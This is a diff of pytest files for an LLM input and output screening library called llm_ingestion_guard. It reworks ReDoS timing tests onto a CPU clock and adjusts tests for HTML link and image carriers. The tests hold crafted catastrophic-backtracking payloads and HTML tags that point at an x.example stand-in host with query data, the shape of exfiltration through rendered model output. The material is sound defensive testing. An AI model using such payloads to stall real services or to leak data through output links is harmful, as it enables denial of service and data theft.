||||||
from llm_ingestion_guard.lexicon import scan_lexicon
|
from llm_ingestion_guard.lexicon import scan_lexicon
|
||||||
from llm_ingestion_guard.output import scan_output, scan_secret_egress
|
from llm_ingestion_guard.output import scan_output, scan_secret_egress
|
||||||
from llm_ingestion_guard.report import Report, Severity, Source
|
from llm_ingestion_guard.report import Report, Severity, Source
|
||||||
|
from redos_clock import scan_seconds
|
||||||
|
|
||||||
|
|
||||||
# --- fixtures assembled at runtime (never contiguous in source) --------------
|
# --- fixtures assembled at runtime (never contiguous in source) --------------
|
||||||
|
|
@ -331,26 +332,61 @@ def test_no_double_oversize_flag_from_lexicon():
|
||||||
|
|
||||||
|
|
||||||
def test_pathological_input_returns_within_a_bound():
|
def test_pathological_input_returns_within_a_bound():
|
||||||
# A scanner that hangs on crafted input IS the DoS. This bounds the runtime
|
# The composed gate terminates on a full-cap payload. It is NOT a ReDoS row
|
||||||
# so a hang or a blowup fails loudly; it is NOT a throughput regression test.
|
# and NOT a throughput regression test: measured against size-matched
|
||||||
# The name overstates what the payload proves: measured against size-matched
|
|
||||||
# ordinary prose this blob is the FASTER side (0.93x / 0.96x, order swapped),
|
# ordinary prose this blob is the FASTER side (0.93x / 0.96x, order swapped),
|
||||||
# so it does not exercise catastrophic backtracking. That duty is carried by
|
# so it exercises no catastrophic backtracking. That duty is carried by the
|
||||||
# test_lexicon.py::test_redos_pathological_subagent_input_returns_fast, which
|
# crafted table below and by test_lexicon.py. What is unique here is the size:
|
||||||
# crafts against a known-bad nested `.*?` pattern.
|
# 1_000_200 chars, 200 over the max_scan_chars default, so this also drives
|
||||||
# Bound set from measurement, not preference: the slowest legitimate run of
|
# the truncate-and-flag oversize path. Do not resize it.
|
||||||
# this size is ordinary prose on a cold process (~4.2s); the blob itself runs
|
#
|
||||||
# 4.70s cold / 3.40-3.73s warm. The old 5.0s sat ~6% over that and failed on
|
# THE WALL CLOCK IS GONE, and the "or a hang" half of the old claim with it.
|
||||||
# a loaded machine. 10.0s is ~2.4x the slowest observed legitimate run.
|
# It was kept on `time.monotonic()` on the grounds that a BLOCKING hang burns
|
||||||
# The payload is 1_000_200 chars -- 200 over the max_scan_chars default, so
|
# no CPU and only a wall clock catches it. True in general, and inapplicable
|
||||||
# this also exercises the truncate-and-flag oversize path. Do not resize it.
|
# here: `scan_output` is pure `re` over an in-memory `str` -- no open(), no
|
||||||
|
# socket, no subprocess, no threading, no lock, no sleep anywhere on the path
|
||||||
|
# (`urllib.parse` is string splitting). There is no way for this code to stop
|
||||||
|
# without spending cycles, so the wall clock guarded a mode that cannot occur
|
||||||
|
# while measurably producing false red. Measured on this machine, same
|
||||||
|
# payload, idle vs 48 busy processes (~4x oversubscription on 16 logical):
|
||||||
|
#
|
||||||
|
# wall 3.30 / 3.29 / 3.13s -> 20.71 / 21.63s <- 2x OVER the old bound
|
||||||
|
# cpu 3.30 / 3.18 / 3.20s -> 7.02 / 7.62s <- bounded by SMT, ~2.4x
|
||||||
|
#
|
||||||
|
# Bound derivation on the surviving clock: slowest legitimate content of this
|
||||||
|
# size is ordinary prose (3.02-3.07s idle CPU, ~4.7s on a cold process), and
|
||||||
|
# CPU inflation under contention tops out near 2x -- 7.62s measured, flat
|
||||||
|
# beyond, for the reason `test_the_redos_clock_ignores_time_this_process_did_
|
||||||
|
# not_spend` derives. 20.0s is ~2.6x the slowest observed legitimate run and
|
||||||
|
# still catches a blowup by orders of magnitude.
|
||||||
|
#
|
||||||
|
# That last claim is measured, not extrapolated, because no in-repo
|
||||||
|
# vulnerable form can turn this row red: its payload is a blob, not a crafted
|
||||||
|
# one, so none of the quadratic patterns this suite fixed (`[`, `<a:`,
|
||||||
|
# long-attribute, the sub-agent lazy run) fire on it. What the row actually
|
||||||
|
# guards is a FUTURE pattern that is quadratic on long runs -- so that is
|
||||||
|
# what was patched in to prove the bound live: `A+\s*EXFILTRATE`, one run
|
||||||
|
# followed by a required literal the payload never supplies, the exact defect
|
||||||
|
# class 0.3.2 and the input-path sweep both fixed. The row failed at 64.77s
|
||||||
|
# CPU against the 20.0s bound, 3.2x over. Removed again after.
|
||||||
|
#
|
||||||
|
# The cost of dropping the wall clock, stated: an infinite loop in the gate
|
||||||
|
# would now hang the suite instead of failing it. That is the same trade
|
||||||
|
# `tests/redos_clock.py` documents and every other bound in this suite already
|
||||||
|
# takes; this row was the last one paying false-red premiums to opt out of it.
|
||||||
payload = ("A" * 5000 + " ") * 200 # ~1MB of blob-ish text
|
payload = ("A" * 5000 + " ") * 200 # ~1MB of blob-ish text
|
||||||
start = time.monotonic()
|
assert scan_seconds(scan_output, payload) < 20.0
|
||||||
scan_output(payload)
|
|
||||||
assert time.monotonic() - start < 10.0
|
|
||||||
|
|
||||||
|
|
||||||
# --- crafted ReDoS payloads against OUR OWN patterns (OWASP LLM10) -----------
|
# --- crafted ReDoS payloads against OUR OWN patterns (OWASP LLM10) -----------
|
||||||
|
#
|
||||||
|
# Every bound below goes through `scan_seconds`, so the rows share ONE clock and
|
||||||
|
# one derivation -- and since `redos_clock` is imported, not copied, that "one"
|
||||||
|
# now spans every ReDoS bound in the suite, not just this file's. The
|
||||||
|
# neighbouring test above keeps its own wall clock on purpose -- see the
|
||||||
|
# instrument test for why the two must not be merged.
|
||||||
|
|
||||||
|
|
||||||
# The gap the test above explicitly does NOT cover. Every pattern here has the
|
# The gap the test above explicitly does NOT cover. Every pattern here has the
|
||||||
# same shape: a `+`/`*` run followed by a REQUIRED literal, reachable from a
|
# same shape: a `+`/`*` run followed by a REQUIRED literal, reachable from a
|
||||||
# short anchor. The payload repeats that anchor and never supplies the literal,
|
# short anchor. The payload repeats that anchor and never supplies the literal,
|
||||||
|
|
@ -422,9 +458,42 @@ _REDOS_PAYLOADS = [
|
||||||
)
|
)
|
||||||
def test_crafted_redos_payload_stays_bounded(scanner, unit, n):
|
def test_crafted_redos_payload_stays_bounded(scanner, unit, n):
|
||||||
payload = (unit * (n // len(unit) + 1))[:n]
|
payload = (unit * (n // len(unit) + 1))[:n]
|
||||||
start = time.monotonic()
|
assert scan_seconds(scanner, payload) < 2.0
|
||||||
scanner(payload)
|
|
||||||
assert time.monotonic() - start < 2.0
|
|
||||||
|
def test_the_redos_clock_ignores_time_this_process_did_not_spend():
|
||||||
|
# The instrument the bounds above are measured on, pinned -- because getting
|
||||||
|
# it wrong makes a GREEN suite look red. In 0.7.0 these bounds ran on
|
||||||
|
# `time.monotonic()`, and two rows failed at 2.24s / 3.66s against the 2.0s
|
||||||
|
# bound while two census processes had the CPU; the same rows passed 3/3 on
|
||||||
|
# an idle machine. The scans had not slowed down -- they were descheduled.
|
||||||
|
#
|
||||||
|
# Measured on this machine (16 logical / 8 physical cores), `lexicon-script-tag`,
|
||||||
|
# shipped form, idle vs 2x vs 4x oversubscription:
|
||||||
|
#
|
||||||
|
# wall 0.74s -> 3.55s -> 8.13s (11x, still climbing with load)
|
||||||
|
# cpu 0.74s -> 1.42s -> 1.50s (2.0x, flat from 2x to 4x)
|
||||||
|
#
|
||||||
|
# Wall-clock inflation is proportional to how many other processes want the
|
||||||
|
# CPU and has no ceiling. Process CPU inflation is bounded by SMT and memory
|
||||||
|
# contention -- a sibling hyperthread can cost you roughly 2x and nothing
|
||||||
|
# beyond it, which is why the two right-hand columns barely differ. On an
|
||||||
|
# idle machine the two clocks are the same number (measured ratio 1.00), so
|
||||||
|
# switching instrument re-derives NOTHING above: every figure in the bound
|
||||||
|
# derivation stays true as a CPU-time figure.
|
||||||
|
#
|
||||||
|
# What this clock gives up: a scan that BLOCKS forever burns no CPU, so it
|
||||||
|
# would hang the suite instead of failing it. Acceptable here -- these
|
||||||
|
# scanners are pure regex over an in-memory string, with no I/O and no locks,
|
||||||
|
# so the only way they can be slow is by spending cycles. That held for
|
||||||
|
# `test_pathological_input_returns_within_a_bound` above too, once its path
|
||||||
|
# was actually checked for something that could block; it kept a wall clock
|
||||||
|
# on the "or a hang" claim until then, and paid 21.6s against a 10.0s bound
|
||||||
|
# under load for a mode it could not have.
|
||||||
|
#
|
||||||
|
# A sleep is the defect class at its purest: wall-clock seconds this process
|
||||||
|
# did not spend. 0.4s is 4x the assertion, so this cannot pass by timing luck.
|
||||||
|
assert scan_seconds(lambda _: time.sleep(0.4), "") < 0.1
|
||||||
|
|
||||||
|
|
||||||
def test_crafted_redos_payload_bounded_through_the_public_gate():
|
def test_crafted_redos_payload_bounded_through_the_public_gate():
|
||||||
|
|
@ -433,9 +502,7 @@ def test_crafted_redos_payload_bounded_through_the_public_gate():
|
||||||
# invokes is bounded too -- with the worst measured payload (`<a:`, 660x the
|
# invokes is bounded too -- with the worst measured payload (`<a:`, 660x the
|
||||||
# slowest legitimate content of the same size).
|
# slowest legitimate content of the same size).
|
||||||
payload = ("<a:" * (_REDOS_N // 3 + 1))[:_REDOS_N]
|
payload = ("<a:" * (_REDOS_N // 3 + 1))[:_REDOS_N]
|
||||||
start = time.monotonic()
|
assert scan_seconds(scan_output, payload) < 2.0
|
||||||
scan_output(payload)
|
|
||||||
assert time.monotonic() - start < 2.0
|
|
||||||
|
|
||||||
|
|
||||||
def test_gate_is_bounded_on_the_payload_the_first_sweep_missed():
|
def test_gate_is_bounded_on_the_payload_the_first_sweep_missed():
|
||||||
|
|
@ -447,9 +514,7 @@ def test_gate_is_bounded_on_the_payload_the_first_sweep_missed():
|
||||||
# test_lexicon.py::test_crafted_redos_payload_stays_bounded_in_the_lexicon;
|
# test_lexicon.py::test_crafted_redos_payload_stays_bounded_in_the_lexicon;
|
||||||
# this row exists so the composed gate a caller actually invokes is covered.
|
# this row exists so the composed gate a caller actually invokes is covered.
|
||||||
payload = "[" * _REDOS_N
|
payload = "[" * _REDOS_N
|
||||||
start = time.monotonic()
|
assert scan_seconds(scan_output, payload) < 2.0
|
||||||
scan_output(payload)
|
|
||||||
assert time.monotonic() - start < 2.0
|
|
||||||
|
|
||||||
|
|
||||||
def test_gate_is_bounded_on_the_long_attribute_arm():
|
def test_gate_is_bounded_on_the_long_attribute_arm():
|
||||||
|
|
@ -458,10 +523,27 @@ def test_gate_is_bounded_on_the_long_attribute_arm():
|
||||||
# caller actually invokes inherits it. Not expressible as a repeating unit —
|
# caller actually invokes inherits it. Not expressible as a repeating unit —
|
||||||
# the tag has to CLOSE for the body to be handed on — which is exactly why
|
# the tag has to CLOSE for the body to be handed on — which is exactly why
|
||||||
# the unit-table above never covered it.
|
# the unit-table above never covered it.
|
||||||
payload = "<a " + "A" * _REDOS_N + ">"
|
#
|
||||||
start = time.monotonic()
|
# The carrier is `<script `, not the `<a ` this row shipped with through
|
||||||
scan_output(payload)
|
# 0.7.0, because 0.7.0's own no-URL narrowing killed the row: `<a>` is in
|
||||||
assert time.monotonic() - start < 2.0
|
# `_URL_AFFORDANCE_TAGS`, so a bare `<a ...>` carrying no URL attribute is
|
||||||
|
# now inert and returns BEFORE the body reaches `URL_IN_TEXT_RE` — the arm
|
||||||
|
# this row exists to guard. Measured with the pre-fix uncapped scheme run
|
||||||
|
# patched back in, at _REDOS_N through `scan_active_content`:
|
||||||
|
#
|
||||||
|
# <a ...> 0.028s and NO findings <- dead: never reaches the arm
|
||||||
|
# <script ...> 12.475s <- the arm, still quadratic
|
||||||
|
# <a href=x …> 12.719s
|
||||||
|
# <form ...> 17.092s
|
||||||
|
#
|
||||||
|
# So the row was green against the vulnerable form: separation 1.0x, zero
|
||||||
|
# signal. With `<script ` it is 0.53s shipped vs 18.85s vulnerable through
|
||||||
|
# `scan_output` — 35x apart, with the bound 3.8x above the shipped side.
|
||||||
|
# `<script>` is the durable choice of the three: it is active by NAME with no
|
||||||
|
# attributes at all, so no future URL-shaped narrowing can make it inert the
|
||||||
|
# way it just did to `<a >`.
|
||||||
|
payload = "<script " + "A" * _REDOS_N + ">"
|
||||||
|
assert scan_seconds(scan_output, payload) < 2.0
|
||||||
|
|
||||||
|
|
||||||
# --- ZWJ inside emoji sequences on the output gate ---------------------------
|
# --- ZWJ inside emoji sequences on the output gate ---------------------------
|
||||||
|
|
|
||||||
|
|
@ -4,10 +4,9 @@ Core invariants (BRIEF §9): clean input returns byte-identical with an all-zero
|
||||||
report; the sanitizer only ever *removes* — its output is always a subsequence
|
report; the sanitizer only ever *removes* — its output is always a subsequence
|
||||||
of the input.
|
of the input.
|
||||||
"""
|
"""
|
||||||
import time
|
|
||||||
|
|
||||||
from llm_ingestion_guard.sanitize import sanitize
|
from llm_ingestion_guard.sanitize import sanitize
|
||||||
from llm_ingestion_guard.report import Severity, Source
|
from llm_ingestion_guard.report import Severity, Source
|
||||||
|
from redos_clock import scan_seconds
|
||||||
|
|
||||||
|
|
||||||
def _is_subsequence(sub: str, full: str) -> bool:
|
def _is_subsequence(sub: str, full: str) -> bool:
|
||||||
|
|
@ -92,19 +91,21 @@ _REDOS_N = 100_000
|
||||||
|
|
||||||
def test_crafted_comment_payload_stays_bounded():
|
def test_crafted_comment_payload_stays_bounded():
|
||||||
payload = ("<!--" * (_REDOS_N // 4 + 1))[:_REDOS_N]
|
payload = ("<!--" * (_REDOS_N // 4 + 1))[:_REDOS_N]
|
||||||
start = time.monotonic()
|
assert scan_seconds(sanitize, payload) < 2.0
|
||||||
sanitize(payload)
|
|
||||||
assert time.monotonic() - start < 2.0
|
|
||||||
|
|
||||||
|
|
||||||
def test_legitimate_comment_heavy_document_is_far_under_the_bound():
|
def test_legitimate_comment_heavy_document_is_far_under_the_bound():
|
||||||
# The bound above only has signal if ordinary comment-dense content is
|
# The bound above only has signal if ordinary comment-dense content is
|
||||||
# nowhere near it: this is the same size, 100% closed comments.
|
# nowhere near it: this is the same size, 100% closed comments.
|
||||||
|
#
|
||||||
|
# This row is the legitimate SIDE of that separation, not a second pin on the
|
||||||
|
# defect: patching the lazy `<!--.*?-->` form back in leaves it green (0.016s),
|
||||||
|
# because closed comments never make the required literal go missing. It is
|
||||||
|
# the tighter of the two bounds and so the more load-sensitive, which is why
|
||||||
|
# it moves to the CPU clock along with its neighbour.
|
||||||
unit = "<!-- a note -->"
|
unit = "<!-- a note -->"
|
||||||
payload = (unit * (_REDOS_N // len(unit) + 1))[:_REDOS_N]
|
payload = (unit * (_REDOS_N // len(unit) + 1))[:_REDOS_N]
|
||||||
start = time.monotonic()
|
assert scan_seconds(sanitize, payload) < 0.5
|
||||||
sanitize(payload)
|
|
||||||
assert time.monotonic() - start < 0.5
|
|
||||||
|
|
||||||
|
|
||||||
def test_comment_stripping_survives_the_redos_fix():
|
def test_comment_stripping_survives_the_redos_fix():
|
||||||
|
|
|
||||||
|
|
@ -183,11 +183,38 @@ def test_inert_vendor_doc_html_is_not_active(text):
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize("text", [
|
@pytest.mark.parametrize("text", [
|
||||||
'<a href="https://x.example/p">here</a>', '<img src="https://x.example/a.png">',
|
'<img src="https://x.example/a.png">', '<div onclick="x()">clickme</div>',
|
||||||
'<div onclick="x()">clickme</div>',
|
'<iframe src="https://x.example/x"></iframe>',
|
||||||
])
|
])
|
||||||
def test_active_raw_html_still_fails_secure_on_upload(text):
|
def test_zero_click_raw_html_still_fails_secure_on_upload(text):
|
||||||
# The other half of the same correction: `a` and `img` are active by name, so
|
# The other half of the same correction: `img` is active by name, so a
|
||||||
# hand-written links and images in raw HTML *are* caught. The overcount is in
|
# hand-written image in raw HTML *is* caught. The overcount is in the
|
||||||
# the formatting tags above, not in a weakened rule.
|
# formatting tags above, not in a weakened rule.
|
||||||
assert screen_output(text, PRESET_USER_UPLOAD).disposition is Disposition.FAIL_SECURE
|
assert screen_output(text, PRESET_USER_UPLOAD).disposition is Disposition.FAIL_SECURE
|
||||||
|
|
||||||
|
|
||||||
|
def test_split_tightens_the_trusted_tier_when_both_carriers_are_present():
|
||||||
|
# The cost side of the carrier split, pinned because it runs OPPOSITE to the
|
||||||
|
# change's purpose. Splitting one class into two means a document carrying
|
||||||
|
# both an `<img src>` and an `<a href>` now emits TWO findings at MEDIUM+
|
||||||
|
# where it emitted one, which trips the compound overlay: WARN through 0.6.1,
|
||||||
|
# QUARANTINE_REVIEW from 0.7.0. On the trusted preset nothing was hard-failed
|
||||||
|
# to begin with, so this is the only direction the split can move it.
|
||||||
|
both = ('<img src="https://x.example/a.png?d=1"> '
|
||||||
|
'and <a href="https://x.example/p?d=2">t</a>')
|
||||||
|
assert screen_output(both, PRESET_TRUSTED_SOURCE).disposition is Disposition.QUARANTINE_REVIEW
|
||||||
|
|
||||||
|
# The same document with only the zero-click carrier still WARNs on trusted:
|
||||||
|
# the escalation comes from the second finding, not from a changed severity.
|
||||||
|
only_img = '<img src="https://x.example/a.png?d=1">'
|
||||||
|
assert screen_output(only_img, PRESET_TRUSTED_SOURCE).disposition is Disposition.WARN
|
||||||
|
|
||||||
|
|
||||||
|
def test_raw_anchor_is_held_for_review_not_hard_failed():
|
||||||
|
# 0.7.0's carrier split. A raw anchor was FAIL_SECURE through 0.6.1 while the
|
||||||
|
# identical markdown link was WARN — an asymmetry of syntax, not affordance.
|
||||||
|
# It is now held for a human like every other click-required carrier. Pinned
|
||||||
|
# HERE, at the composed gate, because what a consumer feels is the
|
||||||
|
# disposition, not the label: this must never reach WARN either.
|
||||||
|
result = screen_output('<a href="https://x.example/p">here</a>', PRESET_USER_UPLOAD)
|
||||||
|
assert result.disposition is Disposition.QUARANTINE_REVIEW, result
|
||||||
|
|
|
||||||
Loading…
Add table
Add a link
Reference in a new issue